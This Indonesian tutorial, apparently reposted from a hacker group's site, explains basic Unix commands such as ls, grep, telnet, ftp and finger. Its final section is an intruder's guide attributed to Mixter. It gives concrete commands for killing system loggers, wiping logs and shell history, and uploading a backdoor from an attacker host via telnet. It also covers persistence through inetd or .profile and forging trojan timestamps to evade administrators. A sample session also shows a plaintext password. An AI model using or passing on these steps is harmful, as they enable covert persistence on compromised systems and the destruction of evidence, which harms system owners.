29699939-Dasar-Dasar-Perintah-Unix

DASAR DASAR PERINTAH UNIXSumber korido-crew.tk :

Berikut ini merupakan beberapa perintah pada Unix yang saya ambil dari forum tetangga.Pada berbagai Clone Unix (BSD,Linux,Sunos,System V,SCO,IRIX,AIX) hampirmempunyai persamaan satu sama lain nya. Sebagai Contoh saya berikan Caramenjalankan perintah Linux ini sebagian saya ambil dari tutorial Kecoak Elektronik danPerintah Jitu dari HAcker Israel yaitu Mixter

:: Tutorial CyberBug

PERINTAH-PERINTAH UNIXSebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam hurufkecil,dan Linux/UNIX membedakan huruf besar dan kecil.

------> ls

Ingat perintah DIR di DOS? ... nah perintah ini sama dgn DIR, gunanya untukmenampilkan 'list' file di dalam directory. Perintah ls juga dilengkapi dengan flagtambahan yang bisa di lihat dengan mengetik :

ls --help ; menampilkan bantuan

man ls ; man bisa juga diartikan manual, jadi manual ls

Beberapa perintah ls yang umum adalah :

ls -l ; menampilkan informasi tambahan (l = long)

ls -a ; menampilkan hidden file (a = attribute)

ls -la

Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki'owns', file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain,contoh :

rwxr-x--x

Catatan :

karakter 1-3: user/owner permissions

karakter 4-6: group permissions

karakter 7-8: other permissions

This is what the letters mean:

r - read, permissions utk 'baca'

w - write, permission utk 'tulis'

x - (e)xecute, permission utk 'menjalankan'

Jadi pada contoh diatas :

user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgnuser/owner dpt read/baca, execute/jalankan file user lain dapat execute/menjalankan filetsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalahdirectory

------> cat

Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kirasama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : "cat " Untukmembuat file ketik : "cat > " ketik isi file dan utk menyimpan tekan CTRL + C atauCTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin dataditambahkan kefile yang sudah ada ganti > dengan >>

------> more

Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt

------> grep

Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txtakan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt

------> man

UNIX help/manual, ketik : man untuk eksekusi. man pwd

------> echo

echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :

echo "saya belajar linux"

saya belajar linux

atau untuk membuat file, seperti :

echo "biff n" > .profile

yang akan membuat file .profile di directory aktif yg berisi teks "biff n" atau menambahfile isi file dgn mengganti > dengan >>

------> cp

copy, dipakai untuk mengcopy file.

cp jilid1.txt jilid1.txt.backup

cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup

------> mv

move, mengganti nama file atau directory

mv jilid1.txt jilid1a.txt

mv backup bak

------> rm

remove, hapus file

rm jilid1.txt ; hapus file jilid1.txt

rm * ; hapus semua file di directory aktif (hati-hati!)

------> cd

change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS

cd /root

perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash)

------> mkdir

make directory, membuat directory

mkdir backup

------> rmdir

remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelummenghapus directory.

rmdir backup

------> who

who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagaiberikut :

cyberservices:~$ who

root tty1 Dec 20 17:47

cyberbug tty2 Dec 20 17:48

cyberbug tty3 Dec 20 17:48

cyberbug ttyp0 Dec 20 18:43 (localhost)

Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminalline yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempatmenunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka mainlangsung dari console.

------> whoami

Kalo lupa diri ini perintahnya : Siapakah Aku?

cyberservices:~$ whoami

cyberbug

------> who am i

Ini juga kalo sudah lupa daratan )

cyberservices:~$ who am i

cyberservices!cyberbug tty3 Dec 20 17:48

------> pwd

Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saatjalan2, sudah gak tau mo pulang lewat mana

cyberservices:~$ pwd

/home/cyberbug

------> ps

Menampilkan proses yang aktif

cyberservices:~$ ps

PID TTY STAT TIME COMMAND

87 2 S 0:00 -bash

88 3 S 0:00 -bash

1440 2 S 0:00 pico jilid2.txt

1443 3 R 0:00 ps

------> ping

Mengecek host apakah 'up' utk istilah teknisnya silakan 'man ping'

cyberservices:~$ ping localhost

PING localhost (127.0.0.1): 56 data bytes

64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms





--- localhost ping statistics ---

5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max =0.1/0.1/0.2 ms

cyberservices:~$ ping 127.0.0.1

PING 127.0.0.1 (127.0.0.1): 56 data bytes






--- 127.0.0.1 ping statistics ---

5 packets transmitted, 5 packets received, 0% packet loss

round-trip min/avg/max = 0.1/0.1/0.2 ms

cyberservices:~$

Perhatikan bahwa localhost dan 127.0.0.1 adalah sama

127.0.0.1 adalah local loopback yang disediakan untuk testing.

------> finger

Mencari informasi user

cyberservices:~$ finger

Login Name Tty Idle Login Time Office Office Phone

cyberbug CyberBug 2 Dec 22 01:10


root 1 1:37 Dec 22 01:10

cyberservices:~$ finger @cyberservices.com

[cyberservices.com]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00




root 1 1:39 Dec 22 01:10

cyberservices:~$ finger @localhost

[localhost]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00




root 1 1:40 Dec 22 01:10

cyberservices:~$ finger cyberbug

Login: cyberbug Name: CyberBug

Directory: /home/cyberbug Shell: /bin/bash

On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle

On since Tue Dec 22 01:10 (PHT) on tty3

Last login Tue Dec 22 01:13 (PHT) on tty4

Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75

#cyberbug"

No mail.

No Plan.

cyberservices:~$ finger root

Login: root Name:

Directory: /root Shell: /bin/bash

On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle

Mail last read Tue Dec 15 09:19 1998 (PHT)

No Plan.

------> telnet

Melakukan komunikasi dengan host lain melalui telnet protocol

cyberservices:~$ telnet localhost

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

Welcome to Linux 2.0.34.

cyberservices login: cyberbug

Password: 3m4nggu3p1k1r1n

Linux 2.0.34.

Last login: Tue Dec 22 01:13:52 on tty4.

No mail.

cyberservices:~$ telnet localhost 25

Trying 127.0.0.1...



220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998

03:52:51 +0800

helo darling

250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to

meet you

mail from: [email protected]

250 [email protected]... Sender ok

rcpt to: [email protected]

250 [email protected]... Recipient ok (will queue)

data

354 Enter mail, end with "." on a line by itself

Kukirim lagu dan salam rinduku .

250 EAA01615 Message accepted for delivery quit


Trying 127.0.0.1...


Escape character is '^]'. +OK cyberservices POP3 Server (Version 1.005l) ready at

user root

+OK please send PASS command pass 3m4nggu3p1k1r1n

+OK 2 messages ready for root in /usr/spool/mail/root stat

+OK 2 7227

retr 1

quit

------> ftp

Menggunakan file tranfer program

mailto:[email protected]




cyberservices:~$ ftp localhost


220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May20 13:45:04 CDT 1998) ready.

Name (localhost:cyberbug): ftp

331 Guest login ok, send your complete e-mail address as password.

Password: [email protected]

230-Welcome, archive user! ... blah blah ... blah

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>

ftp juga bisa dilakukan dengan melakukan telnet ke port 21


Trying 127.0.0.1...



220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May20 13:45:04 CDT 1998) ready.

------> talk

Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:

talk root

atau

talk [email protected]



[Waiting for your party to respond]

[Ringing your party again]

Di terminal root akan muncul pesan :

Message from Talk_Daemon@cyberservices at 4:00 ...

talk: connection requested by cyberbug@localhost.

talk: respond with: talk cyberbug@localhost

root harus mengetik talk cyberbug@localhost jika ingin menjawab request

talk cyberbug@localhost

[Connection established]

:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)

1. Perintah Untuk Kompilasi File

ex. #gcc -o namafile filekompilasi

#gcc -o pscan pscan.c

2. Perintah Running file eksekusi

ex. #./file

#./pscan

#./scaner.pl

#./scanner.sh

3. Perintah Hentikan proses

ex.# Ctrl+c

4. Perintah Proses sementara

ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)

5. Perintah ganti Shell (pada FreeBSD)

ex.#chsh ---> ksh,bash,tcsh

6. Perintah Ganti Passwd

ex.#passwd

7. Perintah melihat ip suatu host

ex.#dig ip

ex.#nslookup ip

8. Perintah editor

ex.#pico wepedodol.c

9. perintah pipa, dua proses sekaligus

ex.# ls -al |head file

akan menanmpilakn direktori bagian atas nya saja

10.perintah ganti mode

ex.#chmod +x file

r - read, permissions utk 'baca'

w - write, permission utk 'tulis'

x - (e)xecute, permission utk 'menjalankan'

:: Begitu aja dolo yaaa ok say.....

::: Keterangan Lae Kita Mixter =

Here are my suggestions...

1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turnedoff. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure andmessages Normally, these logs are the only ones with the intruders IP and traces of a rootcompromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE isimportant. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named oreven /. Very unprofessional .

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the

frequency the system is being maintained, administrated, if the logfiles are beinganalyzed.

* Look how many people have access to it (/etc/passwd) - the more the better for you(keeps attention away from you).

* Look if the system is already backdoored!! you might want to remove other backdoors.

* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmon's etc before you do anything greaton the host. If you are paranoid, traceroute the host, and see if non-routers are before thathost (probably IDS, loghost, sniffer, etc).

3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!It is too easy to detect you if you add yourself to /etc/passwd, or open a port bymanipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the firstthings any sane admin will watch for. Install a nice stealthy port backdoor. My approachto uploading files is doing:

(on your box)

$ uuencode -m backdoor.c backdoor.c | less

(on the target box)

uudecode

# cc -o backdoor backdoor.c

A nice different method is putting a daemon on your own box, on port 666, that spits outthe source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 >backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptimeof more than 300 days or so, you might consider not installing the backdoor for startup.Instead, kill the vulnerable daemon, and when the host restarts, come back using anexploit. Normally, you can replace a lame daemon that nobody uses with your backdoor.Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often isactivated but seldom ever used. So, when you want to re-activate your backdoor, [email protected] for a second, and your backdoor is running. You can also add/path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need todo to patch your buggy stuff. If RPM is installed you can try a rpm -Uftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously,because it doesn't need user interaction. If you want, add an additional backdoor in your


ftp://ftp.cdrom.com/rightdir/daemon.rpm

"patched" server. QPOP 2.53 even supports this itself. For all files you replace, youshould modify the time stamps, which wont help, if the admin uses tripwire or cksum, butif the admin is, like most admins, a complete lamer that does find / -ctime to scan fortrojans and thinks he knows his job. To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

this will copy the exact date/time info from /bin/bash over your freshly added trojan.Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that preventstraffic from the outside (-W eth0) to the ports with the buggy daemons, and adding thatcommand to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zonetransfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. Butbe aware that this might get you detected, lets say if you disable port 110 or 143 on anISP's central mail exchange server...

About your backdoor:

Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or evensomething as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots,because they open that host to everyone, letting in sniffers, and probably other peoplewho may damage the host seriously. Make sure to password protect everything that runsas root. A password of a minimum length of 8 characters, because you have no way ofdetecting a brute force attack. For the C programmers, let me say, listen(sockfd,1).Maybe 2 connections, but not more.

For comfortability, you can add some stuff you want to occur on each successfulbackdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If youwant a front-end backdoor with some integrated functions, try gateway[5].

Salinan Korido Crew

Sumber :Korido-crew.tk

29699939-Dasar-Dasar-Perintah-Unix

Documents

Transcript of 29699939-Dasar-Dasar-Perintah-Unix